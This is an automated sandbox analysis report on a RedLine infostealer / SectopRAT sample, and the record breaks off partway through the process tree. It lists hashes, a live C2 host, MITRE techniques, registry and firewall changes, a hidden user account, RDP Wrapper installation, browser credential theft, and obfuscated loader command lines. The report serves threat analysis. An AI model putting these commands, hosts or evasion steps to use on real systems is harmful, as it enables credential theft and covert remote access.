redline | f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14

Analysis

max time kernel
119s
max time network
117s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-12-2024 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Size

4.1MB
MD5

166ad2bad1b89030246c845ef575cb09
SHA1

5875242be7725edd2fc582350d352496d4da1b56
SHA256

f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14
SHA512

c24e79e0adbcb666ac9ba4839441f787cd10fc98a832ae2ecaaffddfa6ffd455f3121bb634e96651931d994426073084bf35685f0372d5b8794e6654640677ef
SSDEEP

98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo

Score

10^/10

redline sectoprat ads6 defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

ads6

bhajhhsy6.fun:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/1028-55-0x0000000000620000-0x000000000063C000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/1028-55-0x0000000000620000-0x000000000063C000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
4512	net.exe
1780	net1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
61	720	cscript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1780	powershell.exe
4768	powershell.exe
1124	powershell.exe
1828	powershell.exe
2856	powershell.exe
4860	powershell.exe
4692	powershell.exe
3252	powershell.exe
4576	powershell.exe
4204	powershell.exe
3240	powershell.exe
2276	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2700	netsh.exe
5008	netsh.exe
3852	netsh.exe
2544	netsh.exe
4800	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 14 IoCs

pid	Process
4356	Potere.exe.com
3576	Potere.exe.com
1868	Riscalda.exe.com
2616	Riscalda.exe.com
3900	Desideri.exe.com
3208	Desideri.exe.com
1028	RegAsm.exe
2176	Potere.exe.com
3340	RegAsm.exe
2988	RDPWInst.exe
4332	RDPWInst.exe
1812	RDPWInst.exe
4500	RDPWInst.exe
2700	RDPWInst.exe

Loads dropped DLL 3 IoCs

pid	Process
1416	svchost.exe
2832	svchost.exe
2228	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\enlibekgdkdjleeaohiekbooaabbjdbe\7954\manifest.json	Potere.exe.com

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
57	raw.githubusercontent.com
61	raw.githubusercontent.com
51	raw.githubusercontent.com
52	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/memory/3340-79-0x0000000000D00000-0x0000000000EEC000-memory.dmp	autoit_exe
behavioral2/memory/3340-82-0x0000000000D00000-0x0000000000EEC000-memory.dmp	autoit_exe
behavioral2/memory/3340-83-0x0000000000D00000-0x0000000000EEC000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\NpWTjsAOuM = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\NpWTjsAOuM = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2616 set thread context of 1028	2616	Riscalda.exe.com	98
PID 3576 set thread context of 2176	3576	Potere.exe.com	99
PID 3208 set thread context of 3340	3208	Desideri.exe.com	97

Drops file in Program Files directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap_new.ini	cscript.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	cmd.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1396	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Riscalda.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Potere.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Riscalda.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Potere.exe.com

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3704	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1656	timeout.exe
1384	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3704	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3536	schtasks.exe
4392	schtasks.exe
2204	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	61	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2176	Potere.exe.com
2176	Potere.exe.com
1780	powershell.exe
1780	powershell.exe
4692	powershell.exe
4692	powershell.exe
2276	powershell.exe
2276	powershell.exe
4768	powershell.exe
4768	powershell.exe
1124	powershell.exe
1124	powershell.exe
1828	powershell.exe
1828	powershell.exe
4204	powershell.exe
4204	powershell.exe
3252	powershell.exe
3252	powershell.exe
4576	powershell.exe
4576	powershell.exe
2856	powershell.exe
2856	powershell.exe
3240	powershell.exe
3240	powershell.exe
4860	powershell.exe
4860	powershell.exe
1416	svchost.exe
1416	svchost.exe
1416	svchost.exe
1416	svchost.exe
2832	svchost.exe
2832	svchost.exe
2832	svchost.exe
2832	svchost.exe
2228	svchost.exe
2228	svchost.exe
2228	svchost.exe
2228	svchost.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1028	RegAsm.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeIncreaseQuotaPrivilege	1172	WMIC.exe
Token: SeSecurityPrivilege	1172	WMIC.exe
Token: SeTakeOwnershipPrivilege	1172	WMIC.exe
Token: SeLoadDriverPrivilege	1172	WMIC.exe
Token: SeSystemProfilePrivilege	1172	WMIC.exe
Token: SeSystemtimePrivilege	1172	WMIC.exe
Token: SeProfSingleProcessPrivilege	1172	WMIC.exe
Token: SeIncBasePriorityPrivilege	1172	WMIC.exe
Token: SeCreatePagefilePrivilege	1172	WMIC.exe
Token: SeBackupPrivilege	1172	WMIC.exe
Token: SeRestorePrivilege	1172	WMIC.exe
Token: SeShutdownPrivilege	1172	WMIC.exe
Token: SeDebugPrivilege	1172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1172	WMIC.exe
Token: SeRemoteShutdownPrivilege	1172	WMIC.exe
Token: SeUndockPrivilege	1172	WMIC.exe
Token: SeManageVolumePrivilege	1172	WMIC.exe
Token: 33	1172	WMIC.exe
Token: 34	1172	WMIC.exe
Token: 35	1172	WMIC.exe
Token: 36	1172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1172	WMIC.exe
Token: SeSecurityPrivilege	1172	WMIC.exe
Token: SeTakeOwnershipPrivilege	1172	WMIC.exe
Token: SeLoadDriverPrivilege	1172	WMIC.exe
Token: SeSystemProfilePrivilege	1172	WMIC.exe
Token: SeSystemtimePrivilege	1172	WMIC.exe
Token: SeProfSingleProcessPrivilege	1172	WMIC.exe
Token: SeIncBasePriorityPrivilege	1172	WMIC.exe
Token: SeCreatePagefilePrivilege	1172	WMIC.exe
Token: SeBackupPrivilege	1172	WMIC.exe
Token: SeRestorePrivilege	1172	WMIC.exe
Token: SeShutdownPrivilege	1172	WMIC.exe
Token: SeDebugPrivilege	1172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1172	WMIC.exe
Token: SeRemoteShutdownPrivilege	1172	WMIC.exe
Token: SeUndockPrivilege	1172	WMIC.exe
Token: SeManageVolumePrivilege	1172	WMIC.exe
Token: 33	1172	WMIC.exe
Token: 34	1172	WMIC.exe
Token: 35	1172	WMIC.exe
Token: 36	1172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3228	WMIC.exe
Token: SeSecurityPrivilege	3228	WMIC.exe
Token: SeTakeOwnershipPrivilege	3228	WMIC.exe
Token: SeLoadDriverPrivilege	3228	WMIC.exe
Token: SeSystemProfilePrivilege	3228	WMIC.exe
Token: SeSystemtimePrivilege	3228	WMIC.exe
Token: SeProfSingleProcessPrivilege	3228	WMIC.exe
Token: SeIncBasePriorityPrivilege	3228	WMIC.exe
Token: SeCreatePagefilePrivilege	3228	WMIC.exe
Token: SeBackupPrivilege	3228	WMIC.exe
Token: SeRestorePrivilege	3228	WMIC.exe
Token: SeShutdownPrivilege	3228	WMIC.exe
Token: SeDebugPrivilege	3228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3228	WMIC.exe
Token: SeRemoteShutdownPrivilege	3228	WMIC.exe
Token: SeUndockPrivilege	3228	WMIC.exe
Token: SeManageVolumePrivilege	3228	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 4216	4760	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	82
PID 4760 wrote to memory of 4216	4760	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	82
PID 4760 wrote to memory of 4216	4760	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	82
PID 4760 wrote to memory of 2204	4760	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	84
PID 4760 wrote to memory of 2204	4760	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	84
PID 4760 wrote to memory of 2204	4760	f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe	84
PID 2204 wrote to memory of 3108	2204	cmd.exe	86
PID 2204 wrote to memory of 3108	2204	cmd.exe	86
PID 2204 wrote to memory of 3108	2204	cmd.exe	86
PID 3108 wrote to memory of 2936	3108	cmd.exe	87
PID 3108 wrote to memory of 2936	3108	cmd.exe	87
PID 3108 wrote to memory of 2936	3108	cmd.exe	87
PID 3108 wrote to memory of 4356	3108	cmd.exe	88
PID 3108 wrote to memory of 4356	3108	cmd.exe	88
PID 3108 wrote to memory of 4356	3108	cmd.exe	88
PID 3108 wrote to memory of 4884	3108	cmd.exe	89
PID 3108 wrote to memory of 4884	3108	cmd.exe	89
PID 3108 wrote to memory of 4884	3108	cmd.exe	89
PID 4356 wrote to memory of 3576	4356	Potere.exe.com	90
PID 4356 wrote to memory of 3576	4356	Potere.exe.com	90
PID 4356 wrote to memory of 3576	4356	Potere.exe.com	90
PID 3108 wrote to memory of 1868	3108	cmd.exe	91
PID 3108 wrote to memory of 1868	3108	cmd.exe	91
PID 3108 wrote to memory of 1868	3108	cmd.exe	91
PID 1868 wrote to memory of 2616	1868	Riscalda.exe.com	92
PID 1868 wrote to memory of 2616	1868	Riscalda.exe.com	92
PID 1868 wrote to memory of 2616	1868	Riscalda.exe.com	92
PID 3108 wrote to memory of 2228	3108	cmd.exe	93
PID 3108 wrote to memory of 2228	3108	cmd.exe	93
PID 3108 wrote to memory of 2228	3108	cmd.exe	93
PID 3108 wrote to memory of 3900	3108	cmd.exe	94
PID 3108 wrote to memory of 3900	3108	cmd.exe	94
PID 3108 wrote to memory of 3900	3108	cmd.exe	94
PID 3108 wrote to memory of 3704	3108	cmd.exe	95
PID 3108 wrote to memory of 3704	3108	cmd.exe	95
PID 3108 wrote to memory of 3704	3108	cmd.exe	95
PID 3900 wrote to memory of 3208	3900	Desideri.exe.com	96
PID 3900 wrote to memory of 3208	3900	Desideri.exe.com	96
PID 3900 wrote to memory of 3208	3900	Desideri.exe.com	96
PID 3208 wrote to memory of 3340	3208	Desideri.exe.com	97
PID 3208 wrote to memory of 3340	3208	Desideri.exe.com	97
PID 3208 wrote to memory of 3340	3208	Desideri.exe.com	97
PID 2616 wrote to memory of 1028	2616	Riscalda.exe.com	98
PID 2616 wrote to memory of 1028	2616	Riscalda.exe.com	98
PID 2616 wrote to memory of 1028	2616	Riscalda.exe.com	98
PID 2616 wrote to memory of 1028	2616	Riscalda.exe.com	98
PID 3576 wrote to memory of 2176	3576	Potere.exe.com	99
PID 3576 wrote to memory of 2176	3576	Potere.exe.com	99
PID 3576 wrote to memory of 2176	3576	Potere.exe.com	99
PID 2616 wrote to memory of 1028	2616	Riscalda.exe.com	98
PID 3576 wrote to memory of 2176	3576	Potere.exe.com	99
PID 3576 wrote to memory of 2176	3576	Potere.exe.com	99
PID 3208 wrote to memory of 3340	3208	Desideri.exe.com	97
PID 3208 wrote to memory of 3340	3208	Desideri.exe.com	97
PID 3340 wrote to memory of 1308	3340	RegAsm.exe	109
PID 3340 wrote to memory of 1308	3340	RegAsm.exe	109
PID 3340 wrote to memory of 1308	3340	RegAsm.exe	109
PID 1308 wrote to memory of 1780	1308	cmd.exe	111
PID 1308 wrote to memory of 1780	1308	cmd.exe	111
PID 1308 wrote to memory of 1780	1308	cmd.exe	111
PID 3340 wrote to memory of 1856	3340	RegAsm.exe	112
PID 3340 wrote to memory of 1856	3340	RegAsm.exe	112
PID 3340 wrote to memory of 1856	3340	RegAsm.exe	112
PID 1856 wrote to memory of 4692	1856	cmd.exe	114

C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
"C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  PID:4216
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3108
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
      4⤵
      System Location Discovery: System Language Discovery
      PID:2936
  - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
      Potere.exe.com A
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4356
    - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3576
      - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com
        6⤵
        Executes dropped EXE
        Drops Chrome extension
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2176
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
      4⤵
      PID:4884
  - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
      Riscalda.exe.com Z
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1868
    - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z
        5⤵
